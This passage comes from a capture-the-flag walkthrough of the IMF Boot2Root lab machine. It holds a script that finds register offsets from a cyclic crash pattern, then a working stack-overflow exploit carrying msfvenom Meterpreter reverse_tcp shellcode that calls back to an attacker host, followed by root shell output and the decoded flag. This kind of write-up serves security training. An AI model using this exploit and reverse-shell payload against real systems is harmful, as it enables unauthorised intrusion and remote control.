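As a cross-check of the crash analysis above (an added example, not from the original write-up and not Metasploit's code), this Python script rebuilds the same Aa0Aa1... pattern and looks up both EIP and EBP from the gdb output. The function names are my own; the register values are the ones shown above.

```python
import string
import struct

# Register values copied from the gdb output above.
CRASH_EIP = 0x41366641
CRASH_EBP = 0x35664134


def cyclic_pattern(length):
    """Upper/lower/digit triplets (Aa0Aa1...Zz9), unique up to 20280 chars."""
    out = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                out.append(upper + lower + digit)
                if 3 * len(out) >= length:
                    return "".join(out)[:length]
    raise ValueError("pattern would repeat beyond 20280 characters")


def register_offset(value, length=2000):
    """Offset of a little-endian 32-bit register value in the pattern, or -1."""
    needle = struct.pack("<I", value).decode("ascii", errors="replace")
    return cyclic_pattern(length).find(needle)


def frame_layout(eip, ebp, length=2000):
    """Locate both registers; on 32-bit x86 the saved EBP sits 4 bytes
    below the saved return address, so the two offsets must agree."""
    ret_off = register_offset(eip, length)
    ebp_off = register_offset(ebp, length)
    return {
        "saved_ebp": ebp_off,
        "return_address": ret_off,
        "consistent": ebp_off >= 0 and ret_off - ebp_off == 4,
    }


if __name__ == "__main__":
    print(frame_layout(CRASH_EIP, CRASH_EBP))
```

Both registers landing 4 bytes apart confirms that the report input overwrites the saved frame pointer and the return address of the same stack frame, which is why the service should not be running as root with an unbounded read.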

So '168' is the magic number... putting it all together we can brew up our little exploit

import socket 
# Connect to target @ 7788 and get to the point of dumping the payload. 
client = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 
client.connect(("192.168.56.101", 7788)) 
client.recv(512) 
client.send("{0}\n".format(48093572)) 
client.recv(512) 
client.send("{0}\n".format(3))
client.recv(512)
# msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.56.1 LPORT=4445 -b "\x00\x0a\x0d" -f python 
buf =  "" 
buf += "\xba\xf6\x10\x7e\x7b\xdb\xc2\xd9\x74\x24\xf4\x5e\x31" 
buf += "\xc9\xb1\x12\x31\x56\x15\x03\x56\x15\x83\xee\xfc\xe2" 
buf += "\x03\x21\xa5\x8c\x08\x11\x1a\x20\xa4\x94\x2c\xa0\xb1" 
buf += "\x78\x81\xad\x56\x21\x72\x6e\xf0\xee\x83\x06\x02\x0f" 
buf += "\x95\x8b\x8b\xee\xff\x55\xd3\xa0\xae\xce\x6a\xa1\x12" 
buf += "\x3c\xec\x90\x92\x07\xec\xc4\x9c\x77\x65\x07\x5d\x9c" 
buf += "\x79\x09\xbd\x6f\x31\xf4\x8f\xf0\x6a\x8e\xf1\x68\x3a" 
buf += "\x9c\x41\x89\x8f\x1d\x5e\x6f" 
# resize the buffer to the correct size 
buf += "a" * (168 - len(buf)) 
#Append EAX Register Info 
buf += "\x63\x85\x04\x08\n" 
client.send(buf)

Looks like we are in! and as root

# cd /root
 # ls
 Flag.txt  TheEnd.txt
 # cat Flag.txt
 flag6{R2gwc3RQcm90MGMwbHM=}

root@nethunterarch:~# echo "R2gwc3RQcm90MGMwbHM=" | base64 -d
 Gh0stProt0c0ls

# cat TheEnd.txt
 ____                        _ __   __
 /  _/_ _  ___  ___  ___ ___ (_) /  / /__
 _/ //  ' \/ _ \/ _ \(_-<(_-</ / _ \/ / -_)
 /___/_/_/_/ .__/\___/___/___/_/_.__/_/\__/
 __  __/_/        _
 /  |/  (_)__ ___ (_)__  ___
 / /|_/ / (_-<(_-</ / _ \/ _ \
 /_/__/_/_/___/___/_/\___/_//_/
 / __/__  ___________
 / _// _ \/ __/ __/ -_)
 /_/  \___/_/  \__/\__/

Congratulations on finishing the IMF Boot2Root CTF. I hope you enjoyed it.
 Thank you for trying this challenge and please send any feedback.

Geckom
 Twitter: @g3ck0ma
 Email: geckom@redteamr.com
 Web: http://redteamr.com

Special Thanks
 Binary Advice: OJ (@TheColonial) and Justin Stevens (@justinsteven)
 Web Advice: Menztrual (@menztrual)
 Testers: dook (@dooktwit), Menztrual (@menztrual), llid3nlq and OJ(@TheColonial)

Conclusion

I had a really good time with the CTF and picked up a few tricks in the process. probably took me around 12 hours from start to finish however broken into a few sessions across two days. all in all a really good time!